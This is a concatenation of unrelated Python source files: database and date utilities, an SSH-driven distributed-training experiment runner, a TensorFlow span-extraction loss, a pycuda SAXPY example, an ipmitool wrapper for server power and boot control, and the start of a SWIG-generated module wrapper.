# FORMAT_DATABASE_DATE_TIME = "%Y-%m-%d %H:%M:%S"
# table of punctuation characters + space
CHARS_TO_DELETE = dict.fromkeys(
i for i in range(sys.maxunicode)
if unicodedata.category(chr(i)).startswith('P') or
not chr(i).isalnum())
def prepare_for_hashing(text):
"""
Given a string with punctuation characters
"""
if not text:
return ''
return text.translate(CHARS_TO_DELETE).lower()
def get_uuid_bin(uuid_text=None):
"""
Note: the returned value needs to be hexlified to be human readable
"""
if not uuid_text:
uuid_text = uuid.uuid1()
lower = str(uuid_text).replace('-', '').lower()
return unhexlify(lower.encode())
# def get_db_url_sqlserver(db_host, db_port, db_name, db_user, db_pass):
# """
# Helper function for creating the "pyodbc" connection string.
#
# @see http://docs.sqlalchemy.org/en/latest/dialects/mssql.html
# @see https://code.google.com/p/pyodbc/wiki/ConnectionStrings
# """
# from urllib import parse
# params = parse.quote(
# "Driver={{FreeTDS}};Server={};Port={};"
# "Database={};UID={};PWD={};"
# .format(db_host, db_port, db_name, db_user, db_pass))
# return 'mssql+pyodbc:///?odbc_connect={}'.format(params)
def get_db_url_mysql(config):
"""
Format the configuration parameters to build the connection string
"""
if 'DB_URL_TESTING' in config:
return config['DB_URL_TESTING']
return 'mysql+mysqlconnector://{}:{}@{}/{}' \
.format(config['DB_USER'],
config['DB_PASS'],
config['DB_HOST'],
config['DB_NAME'])
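# For example (hypothetical credentials):
#   get_db_url_mysql({'DB_USER': 'app', 'DB_PASS': 's3cret',
#                     'DB_HOST': 'localhost', 'DB_NAME': 'demo'})
#   -> 'mysql+mysqlconnector://app:s3cret@localhost/demo'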
def get_db_engine(config):
"""
@see http://docs.sqlalchemy.org/en/latest/core/connections.html
"""
# TODO: add support for connecting to sqlserver
db_name = config.get('DB_NAME')
url = get_db_url_mysql(config)
try:
engine = db.create_engine(url,
pool_size=10,
max_overflow=5,
pool_recycle=3600,
echo=False)
except TypeError as exc:
log.warning("Got exc from db.create_engine(): {}".format(exc))
engine = db.create_engine(url, echo=False)
return engine
def apply_sha256(val):
""" Compute sha256 sum
:param val: the input string
:rtype string: the sha256 hexdigest
"""
m = sha256()
m.update(val.encode('utf-8'))
return m.hexdigest()
def format_date_as_string(val, fmt='%m-%d-%Y'):
"""
:rtype str:
:return the input value formatted as '%Y-%m-%d'
:param val: datetime or string
:param fmt: the input format for the date
"""
if isinstance(val, date):
return val.strftime(fmt)
da = format_date(val, fmt)
if not da:
return ''
return da.strftime(FORMAT_DATABASE_DATE)
def format_date(val, fmt='%m-%d-%Y'):
"""
Transform the input string to a datetime object
:param val: the input string for date
:param fmt: the input format for the date
"""
date_obj = None
try:
date_obj = datetime.strptime(val, fmt)
except Exception as exc:
log.warning("Problem formatting date: {} - {} due: {}"
.format(val, fmt, exc))
return date_obj
def list_grouper(iterable, n, fillvalue=None):
"""
Collect data into fixed-length chunks or blocks.
From: https://docs.python.org/2.7/library/itertools.html#recipes
Example: grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
zip_longest: Make an iterator that aggregates elements from each of the
iterables. If the iterables are of uneven length, missing values are
filled-in with fillvalue. Iteration continues until the longest iterable
is exhausted.
"""
args = [iter(iterable)] * n
return zip_longest(*args, fillvalue=fillvalue)
# def dict_grouper_memory(iterable, n):
# chunks = [iter(iterable.items())] * n
# generators = (dict(filter(None, v)) for v in zip_longest(*chunks))
# return generators
def dict_grouper(iterable, n):
"""
TODO: investigate why not always returning same results
    Stream the elements of the dictionary in groups of "n".
@see http://programeveryday.com/post/using-python-itertools-to-save-memory/
The chain function can take any number of iterables and will return a new
iterable which combines the passed in iterables.
: rtype itertools.chain:
"""
    sourceiter = iter(iterable.items())
    while True:
        group_iter = islice(sourceiter, n)
        # PEP 479: a bare next() raising StopIteration inside a generator
        # becomes a RuntimeError on Python 3.7+, so stop explicitly.
        try:
            first = next(group_iter)
        except StopIteration:
            return
        yield chain([first], group_iter)
# def prin_trace():
# import traceback
# exc_type, exc_value, exc_traceback = sys.exc_info()
# print("*** print_tb:")
# traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
# print("*** print_exception:")
# traceback.print_exception(exc_type, exc_value, exc_traceback,
# limit=2, file=sys.stdout)
# print("*** print_exc:")
# traceback.print_exc()
def ask_yes_no(question, default="y"):
"""Ask a yes/no question via raw_input() and return the answer
as a boolean.
:param question: the question displayed to the user
:param default: the default answer if the user hits <Enter>
"""
valid = {"y": True, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "y":
prompt = " [Y/n] "
elif default == "n":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
        if not choice:
            sys.stdout.write("Please respond with 'yes' or 'no' "
                             "(or 'y' or 'n').\n")
            continue
        choice_letter = choice[0]
if choice_letter in valid:
return valid[choice_letter]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
|
import os
from os.path import expanduser, join, abspath
import subprocess
import datetime
import shutil
import paramiko
class ExpRunner:
def __init__(self, python_exe: str,
script_path: str, script_args: str,
nodes: list, nGPU: str, eth: str, bw_limit: str,
log_folder=None) -> None:
""""""
self.python_bin = abspath(expanduser(python_exe))
self.script_path = abspath(expanduser(script_path))
self.script_args = script_args
self.nodes = nodes
self.nGPU = nGPU # for each machine
        self.eth = eth # name of the NIC
self.bw_limit = bw_limit
self.log_folder = log_folder
self.key = paramiko.RSAKey.from_private_key_file(expanduser("~/.ssh/id_rsa"))
self._init_ssh()
self.exist_logs = self._get_logs()
def _init_ssh(self):
print('='*10, 'initializing ssh connections')
self.clients = []
for node in self.nodes:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=node, username="ubuntu", pkey=self.key)
self.clients.append((node, client))
print('IP', node, 'DONE')
print('='*10, 'initialization for ssh clients DONE')
def _init_host_env(self):
""""""
for ip, cli in self.clients:
check_cmd = "cd ~/; ls|grep distributed-training"
_, stdout, stderr = cli.exec_command(check_cmd)
if stdout.read() != b"":
git_pull = "cd ~/distributed-training; git pull"
self._exec_cli_cmd(cli, git_pull, '{}: git pull'.format(ip))
else:
cmd = "cd ~/; "\
"git clone https://github.com/zarzen/distributed-training.git"
self._exec_cli_cmd(cli, cmd, "{}: clone training scripts".format(ip))
def _exec_cli_cmd(self, cli, cmd, msg=None):
if msg:
print('>'*10, msg, '<'*10)
_, stdout, stderr = cli.exec_command(cmd)
print('cmd stdout: ', stdout.read().decode('utf-8'),
"cmd stderr: ", stderr.read().decode('utf-8'))
if msg:
print('>'*10, 'DONE', msg, '<'*10)
    def bandwidth_control(self):
"""
"""
del_cmd = "sudo tc qdisc del dev {} root tbf rate 40Gbit latency 400ms burst 3000kbit".format(self.eth)
        # if self.bw_limit == "" we skip executing add_cmd
add_cmd = "sudo tc qdisc add dev {} root tbf rate {} latency 400ms burst 3000kbit".format(self.eth, self.bw_limit)
for (ip, cli) in self.clients:
# try to delete rate limit
stdin, stdout, stderr = cli.exec_command(del_cmd)
print(ip, ":", stdout.read(), stderr.read())
stdin, stdout, stderr = cli.exec_command(del_cmd)
print(ip, ":", stdout.read(), stderr.read())
if self.bw_limit:
print(ip, ": adding bandwidth limit", add_cmd)
stdin, stdout, stderr = cli.exec_command(add_cmd)
print(ip, ':', stdout.read(), stderr.read())
def exe_dist_train(self) -> subprocess.Popen:
""" execute distributed training script at rank0
:return process:
"""
train_cmd = self.build_train_cmd()
print("Exec:", " ".join(train_cmd))
p = subprocess.Popen(' '.join(train_cmd), shell=True)
return p
def build_train_cmd(self):
""""""
nNodes = len(self.nodes)
np = str(nNodes * int(self.nGPU))
hosts = ",".join(["{}:{}".format(ip, self.nGPU) for ip in self.nodes])
cmd = ["mpirun",
"-np", np,
"-H", hosts,
"-bind-to", "none",
"-map-by", "slot",
"-x", "NCCL_DEBUG=INFO",
"-x", "LD_LIBRARY_PATH",
"-x", "PATH",
"-x", "PYTHONPATH={}".format(
expanduser("~/autorun/horovod-modified/build/lib.linux-x86_64-3.6")),
"-mca", "btl ^openib",
"-mca", "btl_tcp_if_exclude lo,docker0",
self.python_bin, self.script_path,
self.script_args]
return cmd
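    # For example, with nodes=["localhost", "172.31.24.153"] and nGPU="1",
    # build_train_cmd() produces (joined with spaces):
    #   mpirun -np 2 -H localhost:1,172.31.24.153:1 -bind-to none -map-by slot
    #     -x NCCL_DEBUG=INFO -x LD_LIBRARY_PATH -x PATH -x PYTHONPATH=...
    #     -mca btl ^openib -mca btl_tcp_if_exclude lo,docker0
    #     <python_bin> <script_path> <script_args>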
def _get_logs(self):
cpu_logs, net_logs = self._get_cpu_net_log()
hook_logs, model_logs, mpi_logs = self._get_horovod_logs()
return cpu_logs, net_logs, hook_logs, model_logs, mpi_logs
def run(self):
""""""
self._init_host_env()
print('='*10, "working on bandwidth control")
        self.bandwidth_control()
print('='*10, "bandwidth control DONE")
cpu_p, net_p = self._exe_res_monitor()
print(">"*10, 'launched CPU & Network monitoring')
print('*'*10, 'Start working on experiment script')
train_p = self.exe_dist_train()
train_p.wait()
print('*'*10, 'Experiment finished')
cpu_p.terminate()
net_p.terminate()
print('End experiment')
self.move_log()
def _exe_res_monitor(self):
""" execute cpu and network bandwidth monitor
"""
# record existing logs
cpu_monitor_script = expanduser("~/autorun/monitor_cpu.py")
net_monitor_script = expanduser("~/autorun/monitor_net.py")
cpu_p = subprocess.Popen([self.python_bin, cpu_monitor_script],
stdout=subprocess.DEVNULL)
net_p = subprocess.Popen([self.python_bin, net_monitor_script],
stdout=subprocess.DEVNULL)
return cpu_p, net_p
def move_log(self):
""" rename horovod_logs -> horovod_logs_<bandwidth>,
moving cpu.log and net.log into horovod_logs_<bandwidth> folder
"""
# cpu, net, hook, model, mpi
n_cpu, n_net, n_hook, n_model, n_mpi = self._get_logs()
e_cpu, e_net, e_hook, e_model, e_mpi = self.exist_logs
def _moving(src, dst, files):
for _f in files:
shutil.copy2(join(src, _f), join(dst, _f))
dst_folder = self.log_folder if self.log_folder \
else "./log_archives/{}-{}".format(datetime.datetime.now().strftime("%Y%m%d-%H%M%S"),
self.bw_limit)
os.makedirs(dst_folder)
_moving("./logs/cpu", dst_folder, n_cpu - e_cpu)
_moving("./logs/net", dst_folder, n_net - e_net)
_moving(expanduser("~/horovod_logs/hooks"), dst_folder, n_hook-e_hook)
_moving(expanduser("~/horovod_logs/model_log/"), dst_folder, n_model-e_model)
_moving(expanduser("~/horovod_logs/mpi_events"), dst_folder, n_mpi-e_mpi)
with open(join(dst_folder, "readme"), 'w+') as ofile:
ofile.write("bandwidth limit: " + self.bw_limit)
def _get_cpu_net_log(self):
"""
        record the currently existing logs
"""
log_path = "./logs"
log_path = expanduser(log_path)
net_logs = os.listdir(join(log_path, 'net'))
cpu_logs = os.listdir(join(log_path, 'cpu'))
return set(cpu_logs), set(net_logs)
def _get_horovod_logs(self):
base_dir = expanduser("~/horovod_logs")
hook_logs = os.listdir(join(base_dir, "hooks"))
model_logs = os.listdir(join(base_dir, "model_log"))
mpi_logs = os.listdir(join(base_dir, "mpi_events"))
return set(hook_logs), set(model_logs), set(mpi_logs)
def main():
""""""
python_bin = "/usr/bin/python3"
exp = ExpRunner(python_bin,
"~/autorun/distributed-training/test_scripts/pytorch_resnet101_cifar10.py",
"--epochs 1", # args of the script we want to run
["localhost", "172.31.24.153"], # list of worker's ip
nGPU="1", # nGPU on each machine
eth="ens3", # NIC interface name, used for bandwidth limit
bw_limit="", # limiting bandwidth, 100Mbit, 1Gbit, 10Gbit 25Gbit, 40Gbit,
log_folder="" # if not specified, it will used the timestamp
)
exp.run()
if __name__ == "__main__":
    main()
|
import tensorflow as tf
from utils.bert import bert_utils
from loss import loss_utils
from utils.bert import albert_modules
def span_extraction_classifier(config,
sequence_output,
start_positions,
end_positions,
input_span_mask):
	final_hidden_shape = albert_modules.get_shape_list(sequence_output,
expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/mrc_span/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/mrc_span/output_bias", [2], initializer=tf.zeros_initializer())
	final_hidden_matrix = tf.reshape(sequence_output,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
# apply output mask
adder = (1.0 - tf.cast(input_span_mask, tf.float32)) * -10000.0
start_logits += adder
end_logits += adder
	def compute_loss(logits, positions):
		one_hot_positions = tf.one_hot(positions, depth=seq_length, dtype=tf.float32)
		log_probs = tf.nn.log_softmax(logits, axis=-1)
		loss = -tf.reduce_mean(tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
		return loss
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
return (total_loss, start_logits, end_logits)
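# Standalone NumPy sketch (illustrative, not part of the TF graph above) of the
# two key steps: masking invalid positions with a large negative adder, and the
# one-hot log-softmax cross-entropy used in compute_loss.
import numpy as np

logits_np = np.array([[2.0, 0.5, -1.0, 3.0]], dtype=np.float32)  # [batch=1, seq=4]
span_mask = np.array([[1, 1, 1, 0]], dtype=np.float32)           # last position is padding

masked = logits_np + (1.0 - span_mask) * -10000.0                # same adder as above
log_probs = masked - np.log(np.exp(masked).sum(axis=-1, keepdims=True))
one_hot = np.eye(4, dtype=np.float32)[[0]]                       # gold start position 0
loss = -np.mean(np.sum(one_hot * log_probs, axis=-1))
print(loss)  # the padded position receives ~zero probability mass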
|
# Compute y <- a*x + y on the GPU with cuBLAS SAXPY (single-precision a*x plus y).
import pycuda.autoinit
from pycuda import gpuarray
import numpy as np
from skcuda import cublas

a = np.float32(10)
x = np.float32([1, 2, 3])
y = np.float32([-.345, 8.15, -15.867])

# Copy both operands into device memory.
x_gpu = gpuarray.to_gpu(x)
y_gpu = gpuarray.to_gpu(y)

# Every cuBLAS call needs a context handle: create it, run SAXPY, destroy it.
cublas_context_h = cublas.cublasCreate()
cublas.cublasSaxpy(cublas_context_h, x_gpu.size, a, x_gpu.gpudata, 1, y_gpu.gpudata, 1)
cublas.cublasDestroy(cublas_context_h)

# SAXPY overwrote y_gpu in place; compare it against the NumPy result.
print("Matches the NumPy computation of a*x + y: {}".format(np.allclose(a * x + y, y_gpu.get())))
|
#
# Copyright (c) 2014 Nutanix Inc. All rights reserved.
#
"""
Provides utils related to IPMI, and wrapper around ipmitool calls.
"""
import json
import logging
import re
import time
from curie.curie_error_pb2 import CurieError
from curie.exception import CurieException
from curie.log import CHECK_EQ
from curie.oob_management_util import OobManagementUtil
from curie.util import CurieUtil
log = logging.getLogger(__name__)
class Flag(object):
def __init__(self, switch, value):
self._switch = switch
self._value = value
def __iter__(self):
return iter([self._switch, str(self._value)])
def __str__(self):
return " ".join(self)
def to_unredacted(self):
return self
class RedactedFlag(Flag):
def __iter__(self):
return iter([self._switch, "<REDACTED>"])
def to_unredacted(self):
return Flag(self._switch, self._value)
class RepeatedFlag(Flag):
def __iter__(self):
return iter([self._switch] * self._value)
class SystemEvent(object):
FIELDS = ["event_id", "timestamp", "sensor", "description", "direction"]
TIME_FORMAT = "%m/%d/%Y %H:%M:%S"
def __init__(self, raw_ipmi_output):
ipmi_info = map(lambda col: col.strip(), raw_ipmi_output.split("|"))
# Combine date and time into one field, shift rest of array.
ipmi_info[1] = "%s %s" % (ipmi_info[1], ipmi_info.pop(2))
# NOTE: Setting these fields explicitly, rather than iterating to aid
# with autocomplete and pylint.
self.event_id = int(ipmi_info[0], base=16)
# Event times only have resolution in seconds.
self.timestamp = int(time.mktime(time.strptime(ipmi_info[1],
self.TIME_FORMAT)))
self.sensor = ipmi_info[2]
self.description = ipmi_info[3]
self.direction = ipmi_info[4]
def __str__(self):
return json.dumps(
dict(map(lambda f: (f, getattr(self, f)), self.FIELDS)),
indent=2, sort_keys=True)
class IpmiUtil(OobManagementUtil):
"""
Wraps calls to ipmitool.
Generated commands will be of the form:
<IPMITOOL_ABSPATH> <GENERATED_FLAGS> <COMMAND> [SUB_COMMAND] [CMD_ARGS]
"""
VALID_BOOT_DEVICES = [
"none", "pxe", "disk", "safe", "diag", "cdrom", "bios", "floppy"]
# Upper limit on exponential backoff applied to interval between retries.
_MAX_RETRY_INTERVAL_SECS = 16
def __init__(self, ip, username, password, interface="lanplus",
verbosity=0, ipmitool_abspath="/usr/bin/ipmitool"):
self.host = ip
self.__ipmitool_abspath = ipmitool_abspath
self.__flags = {
"host": Flag("-H", ip),
"user": RedactedFlag("-U", username),
"password": RedactedFlag("-P", password),
"interface": Flag("-I", interface),
"verbosity": RepeatedFlag("-v", verbosity)
}
def get_chassis_status(self):
"""
Returns:
(dict): Map of IPMI chassis status data.
Raises:
CurieException on error.
"""
stdout, stderr = self.__execute_command_with_retries(["chassis", "status"])
output_map = {}
for line in stdout.splitlines():
key, value = line.split(":")
output_map[key.strip()] = value.strip()
return output_map
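  # Typical (abridged) result, as parsed from 'ipmitool chassis status':
  #   {'System Power': 'on', ...}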
def power_cycle(self, async=False):
"""
Power cycles the node associated with 'self.__flags["host"]'.
Args:
async (bool): Optional. If False, making blocking calls to 'power_off'
and then 'power_on'.
If True and node is powered off, performs async 'power_on' call,
otherwise issues the (async) 'power cycle' command.
Returns:
(bool): True on success, else False.
"""
if not self.is_powered_on():
log.warning("power_cycle requested for powered-down node via IPMI at "
"'%s'", self.__flags["host"])
return self.power_on(async=async)
if async:
try:
self.__execute_command_with_retries(["power", "cycle"])
return True
except CurieException:
log.warning("Failed to power cycle", exc_info=True)
return False
# Synchronous: perform blocking calls to power off then power on.
if not self.power_off(async=False):
return False
return self.power_on(async=False)
def power_on(self, async=False):
"""
Powers on the node associated with 'self.__flags["host"]'.
Args:
async (bool): Optional. If False, block until power state is on.
Returns:
(bool): True on success, else False.
"""
# NB: IPMI power ops are not necessarily idempotent, so it's necessary to
# check the power state before issuing the command. This still does not
# guarantee that we're safe from a potential race.
if self.is_powered_on():
return True
try:
self.__execute_command_with_retries(["power", "on"])
except CurieException:
log.exception("Exception in __execute_command_with_retries")
return False
if async:
return True
return CurieUtil.wait_for(
self.is_powered_on,
"node '%s' to power on" % self.__flags["host"]._value,
timeout_secs=600, poll_secs=5)
def power_off(self, async=False):
"""
Powers off the node associated with 'self.__flags["host"]'.
Args:
async (bool): Optional. If False, block until power state is off.
Returns:
(bool): True on success, else False.
"""
# NB: IPMI power ops are not necessarily idempotent, so it's necessary to
# check the power state before issuing the command. This still does not
# guarantee that we're safe from a potential race.
if not self.is_powered_on():
return True
try:
self.__execute_command_with_retries(["power", "off"])
except CurieException:
log.exception("Exception in __execute_command_with_retries")
return False
if async:
return True
return CurieUtil.wait_for(
lambda: not self.is_powered_on(),
"node '%s' to power off" % self.__flags["host"]._value,
timeout_secs=600, poll_secs=5)
def is_powered_on(self):
"""
Checks whether chassis power state is 'on'.
Returns:
(bool) True if powered on, else False.
"""
status = self.get_chassis_status().get("System Power", "")
return status.strip().lower() == "on"
def get_fru_info(self):
"""
Dump FRU info.
Returns:
(list<dict>): List of FRU info dicts.
"""
fru_list = []
# TODO: See if there's a guaranteed upper bound on the number of valid
# fru_ids.
for ii in range(256):
try:
# Get byte-length of FRU data at index 'ii'.
stdout, stderr = self.__execute_command_with_retries(
["raw", "0x0a", "0x10", hex(ii)])
except CurieException:
# Index 0 should exist. Raise exception if we fail to find data.
# Otherwise, assume we've found the last FRU index.
if ii == 0:
raise
break
try:
curr_fru_byte_length = int("0x%s" % "".join(stdout.split()), 16)
except (TypeError, ValueError):
# Unable to parse output as a hex string, consider index as invalid.
curr_fru_byte_length = 0
# Index 0 should not have length 0, otherwise, assume we've found the
# last FRU index.
if curr_fru_byte_length == 0:
if ii == 0:
raise CurieException(
CurieError.kInternalError,
"Failed to parse length for fru_id 0:\n\tstdout=%s\n\tstderr=%s" %
(stdout, stderr))
break
# FRU index 'ii' reports non-zero length, attempt to dump contents.
try:
stdout, stderr = self.__execute_command_with_retries(
["fru", "print", str(ii)])
except CurieException:
log.warning("Unable to read data from fru_id '%s'", exc_info=True)
time.sleep(1)
continue
# Possible FRU data is invalid (in particular, that reading from the
# index will return a block of zeros). This may result in stdout
# reporting an error, or containing no data.
lines = []
if stdout is not None:
# Filter out section headers.
lines = filter(lambda l: l.count(":") > 0, stdout.splitlines())
# Skip empty data.
if lines:
fru_list.append(dict(map(
lambda l: map(str.strip, l.split(":", 1)), lines)))
if not lines:
log.warning("Skipping invalid data from fru_id '%s':\n"
"\tstdout=%s\n"
"\tstderr=%s", ii, stdout, stderr)
# Avoid flooding IPMI with requests.
time.sleep(1)
return fru_list
def get_lan_config(self):
"""
Get IP, MAC address, etc. for the node's IPMI.
Returns:
      (dict): Map of IPMI lan configuration data.
"""
stdout, stderr = self.__execute_command_with_retries(["lan", "print"])
# Various keys have multiline data.
stdout = re.sub(r"\n\s+:", ";:;", stdout)
# Key/Val pairs.
lan_map_pairs = map(
lambda tupl: map(str.strip, tupl),
map(lambda line: line.split(":", 1), stdout.splitlines()))
# Some values may themselves be space separated lists, or lists of colon
# delimited pairs.
sub_objs = filter(lambda pair: ";:;" in pair[1], lan_map_pairs)
sub_objs = map(lambda pair: (pair[0], pair[1].split(";:;")), sub_objs)
sub_lists = filter(lambda pair: ":" not in pair[1], sub_objs)
sub_dicts = filter(lambda pair: ":" in pair[1], sub_objs)
sub_lists = map(lambda pair: (pair[0], map(str.strip, pair[1])), sub_lists)
sub_lists = dict(sub_lists)
sub_dicts = map(lambda pair: (
pair[0], dict(map(str.strip, pair[1].split(":")))), sub_dicts)
sub_dicts = dict(sub_dicts)
lan_map = dict(lan_map_pairs)
lan_map.update(sub_lists)
lan_map.update(sub_dicts)
return lan_map
def get_mac_addrs_supermicro(self):
"""
Get MAC addresses for the node's network cards.
NB: Returns only two addresses, second address is autogenerated.
Returns:
(list<str>): MAC Addresses.
"""
stdout, stderr = self.__execute_command_with_retries(
["raw", "0x30", "0x21"])
byte_list = stdout.split()
CHECK_EQ(len(byte_list), 10, "Failed to retrieve MAC addresses from BMC")
macs = ["-".join(byte_list[-6:])]
byte_list[-1] = "%02x" % (int(byte_list[-1], base=16) + 1)
macs.append("-".join(byte_list[-6:]))
return macs
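  # For example, a 10-byte response "01 00 00 00 0c c4 7a 12 34 56" yields
  # ["0c-c4-7a-12-34-56", "0c-c4-7a-12-34-57"] (second MAC = last byte + 1).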
def get_event_log(self):
"""
Dump System Event Log.
Returns:
(list<dict>): List of events represented as dict/JSON.
"""
stdout, stderr = self.__execute_command_with_retries(["sel", "list"])
return [SystemEvent(line) for line in stdout.splitlines()]
def set_bootdev_pxe(self):
"""
Forces PXE on next boot for the node associated with
'self.__flags["host"]'.
Returns:
(bool): True on success, else False.
"""
try:
self.set_bootdev("pxe")
return True
except Exception:
log.exception("Exception in set_bootdev")
return False
def set_bootdev(self, device):
"""
    Sets the first boot device to `device` on next boot for the node associated
with 'self.__flags["host"]'.
Returns:
(bool): True on success, else False.
"""
if device not in self.VALID_BOOT_DEVICES:
raise CurieException(CurieError.kInvalidParameter,
"Invalid boot device '%s'" % device)
try:
stdout, stderr = self.__execute_command_with_retries(
["chassis", "bootdev", device])
except CurieException:
log.exception("Exception in 'chassis bootdev %s'", device)
return False
return True
def __execute_command(self, cmd):
"""
Executes 'cmd' via ipmitool 'self.__ipmitool_abspath' using '__flags'.
Returns:
(tuple): (rv, stdout, stderr)
Raises:
CurieException on bad input or failure to execute the command.
"""
if isinstance(cmd, basestring):
cmd = cmd.split(" ")
if not isinstance(cmd, list):
raise CurieException(
CurieError.kInternalError,
"'cmd' must be of type list or str, not '%s'" % cmd.__class__.__name__)
generated_cmd = []
map(generated_cmd.extend,
[[self.__ipmitool_abspath], self.__get_flag_list(redacted=False), cmd])
redacted_cmd = []
map(redacted_cmd.extend,
[[self.__ipmitool_abspath], self.__get_flag_list(redacted=True), cmd])
log.info("Executing IPMI command:\n\t'%s'", " ".join(redacted_cmd))
rv, stdout, stderr = CurieUtil.timed_command(
" ".join(generated_cmd), timeout_secs=60,
formatted_cmd=" ".join(redacted_cmd))
cmd_output = "rv=%s\nstdout=%s\nstderr=%s" % (rv, stdout, stderr)
if rv < 0:
raise CurieException(
CurieError.kInternalError,
"Failed to execute command: '%s': %s" % (redacted_cmd, cmd_output))
log.debug(cmd_output)
return (rv, stdout, stderr)
def __execute_command_with_retries(self, cmd, max_retries=5):
"""
Executes 'cmd', retrying on error up to 'max_retries' times.
Interval between calls has exponential backoff applied up to a cap of
'_MAX_RETRY_INTERVAL_SECS'.
Returns:
(tuple): (stdout, stderr)
Raises:
CurieException if 'cmd' does not succeed within 'max_retries' + 1 calls.
"""
curr_retry_interval_secs = 1
for ii in range(max_retries + 1):
try:
rv, stdout, stderr = self.__execute_command(cmd)
if rv == 0:
return stdout, stderr
error_msg = (
"Error executing '%s':\n\trv=%s\n\tstdout=%s\n\tstderr=%s" %
(cmd, rv, stdout, stderr))
except CurieException as exc:
error_msg = "'%s' failed: '%s'" % (cmd, exc)
if ii < max_retries:
log.error(error_msg)
log.info("Retrying (%d of %d retries)", ii + 1, max_retries)
curr_retry_interval_secs = min(self._MAX_RETRY_INTERVAL_SECS,
2 * curr_retry_interval_secs)
time.sleep(curr_retry_interval_secs)
else:
raise CurieException(CurieError.kInternalError, error_msg)
def __get_flag_list(self, redacted=True):
"""
Generates list of command line switch/values to pass with the command.
Args:
redacted (bool): Optional. If False, RedactedFlags are returned unmasked.
Returns:
(list<Flag>): List of flags (corresponds to splitting serialized flags on
whitespace).
"""
flags = []
if not redacted:
map(flags.extend, [f.to_unredacted() for f in self.__flags.values()])
else:
map(flags.extend, self.__flags.values())
return flags
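# Minimal usage sketch (hypothetical BMC address and credentials; requires
# ipmitool installed locally and a reachable BMC):
# util = IpmiUtil("10.0.0.42", "ADMIN", "ADMIN")
# print(util.is_powered_on())
# util.set_bootdev_pxe()
# util.power_cycle(async=False)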
|
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.9
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_actuators')).lstrip('.')
return importlib.import_module(mname)
_actuators = swig_import_helper()
del swig_import_helper
elif version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_actuators', [dirname(__file__)])
except ImportError:
import _actuators
return _actuators
if fp is not None:
try:
_mod = imp.load_module('_actuators', fp, pathname, description)
finally:
fp.close()
return _mod
_actuators = swig_import_helper()
del swig_import_helper
else:
import _actuators
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except __builtin__.Exception:
weakref_proxy = lambda x: x
class SwigPyIterator(_object):
"""Proxy of C++ swig::SwigPyIterator class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _actuators.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
"""
value(SwigPyIterator self) -> PyObject *
Parameters
----------
self: swig::SwigPyIterator const *
"""
return _actuators.SwigPyIterator_value(self)
def incr(self, n=1):
"""
incr(SwigPyIterator self, size_t n=1) -> SwigPyIterator
Parameters
----------
n: size_t
incr(SwigPyIterator self) -> SwigPyIterator
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator_incr(self, n)
def decr(self, n=1):
"""
decr(SwigPyIterator self, size_t n=1) -> SwigPyIterator
Parameters
----------
n: size_t
decr(SwigPyIterator self) -> SwigPyIterator
Parameters
----------
self: swig::SwigPyIterator *
"""
return _actuators.SwigPyIterator_decr(self, n)
def distance(self, x):
"""
distance(SwigPyIterator self, SwigPyIterator x) -> ptrdiff_t
Parameters
----------
x: swig::SwigPyIterator const &
"""
return _actuators.SwigPyIterator_distance(self, x)
def equal(self, x):
"""
equal(SwigPyIterator self, SwigPyIterator x) -> bool
Parameters
----------
x: swig::SwigPyIterator const &
"""
